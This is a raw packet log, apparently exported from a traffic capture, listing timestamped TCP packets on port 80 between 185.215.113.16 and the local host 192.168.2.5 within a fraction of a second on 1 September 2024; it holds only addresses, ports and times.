Sep 1, 2024 06:28:05.090212107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090224028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090233088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090244055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090254068 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090262890 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.090265036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090276957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090286970 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.090286970 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090297937 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090307951 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090317011 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.090322018 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.090337992 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.090358973 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.091147900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091160059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091167927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091177940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091187954 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091197968 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091202974 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.091207027 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091217995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091233015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091236115 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.091244936 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.091254950 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.091267109 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.091295004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.092152119 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092163086 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092173100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092184067 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092192888 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092202902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092205048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.092212915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092221975 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092231989 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092240095 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.092242002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.092262983 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.092278957 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.093067884 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093079090 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093087912 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093097925 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093107939 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093116999 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093126059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093132973 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.093136072 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093146086 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093154907 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093163967 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093173981 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.093178988 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.093189001 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.093189001 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.093206882 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094010115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094021082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094029903 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094041109 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094049931 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094058990 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094063997 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094069958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094080925 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094086885 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094090939 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094094992 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094101906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094110966 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094116926 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094129086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094161987 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094836950 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094847918 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094856977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094866037 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094876051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094885111 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094888926 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094894886 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094904900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094911098 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094913960 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094924927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094933987 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094933987 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094944000 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094949007 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094959974 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.094965935 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.094985008 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095010042 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095573902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095662117 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095741034 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095751047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095762968 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095772982 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095777035 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095782995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095793009 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095799923 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095803022 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095813036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095822096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095834017 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095838070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095846891 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095854044 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095858097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.095870972 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095885038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.095912933 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096834898 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096847057 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096857071 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096867085 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096875906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096885920 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096889019 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096894979 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096904993 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096915007 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096920013 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096925020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096934080 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096937895 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096945047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096959114 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096959114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.096972942 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.096992016 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097748995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097759962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097769022 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097779036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097786903 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097795963 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097798109 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097805977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097812891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097815990 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097826004 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097835064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097845078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097846031 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097853899 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097862959 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097865105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097876072 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.097882032 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097898960 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.097910881 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098447084 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098495007 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098691940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098702908 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098716974 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098726988 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098736048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098737955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098747969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098757029 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098757982 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098767996 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098778009 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098787069 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098787069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098797083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098807096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098807096 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098817110 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098826885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.098829031 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098850012 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.098866940 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.099679947 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099690914 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099700928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099709988 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099720001 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099725962 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.099730015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099740028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099750042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099757910 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.099760056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099771023 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099781036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099786043 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.099791050 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.099806070 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.099823952 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100488901 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100501060 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100509882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100521088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100531101 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100541115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100542068 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100550890 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100559950 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100564957 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100569010 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100578070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100585938 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100588083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100596905 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100605965 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100609064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100619078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.100622892 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100641966 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.100660086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101460934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101473093 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101483107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101492882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101502895 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101511002 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101512909 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101526976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101537943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101547003 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101550102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101560116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101571083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101571083 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101579905 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101589918 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.101589918 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101608038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.101634026 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102137089 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102207899 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102401018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102411985 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102421999 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102432013 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102448940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102461100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102469921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102477074 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102480888 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102490902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102504015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102505922 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102513075 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102523088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102533102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102541924 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102545977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.102547884 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102571011 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.102586985 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103328943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103341103 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103349924 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103359938 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103374958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103384972 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103387117 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103401899 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103413105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103421926 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103430986 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103430986 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103441954 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103451967 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103451967 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103461027 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103471994 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.103476048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103498936 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.103513002 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104233980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104245901 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104254961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104264021 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104274035 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104286909 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104286909 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104288101 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104299068 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104309082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104319096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104325056 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104329109 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104338884 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104345083 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104348898 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104357958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104363918 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104367018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.104382038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.104407072 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105221033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105232000 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105242014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105257034 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105266094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105267048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105276108 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105285883 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105285883 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105294943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105304956 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105310917 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105314970 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105341911 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105355978 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105875015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105885983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105900049 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105910063 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105917931 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105920076 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105931044 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105940104 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105945110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105951071 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105959892 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105962992 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.105969906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105978966 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105979919 CEST	49705	80	192.168.2.5	185.215.113.16
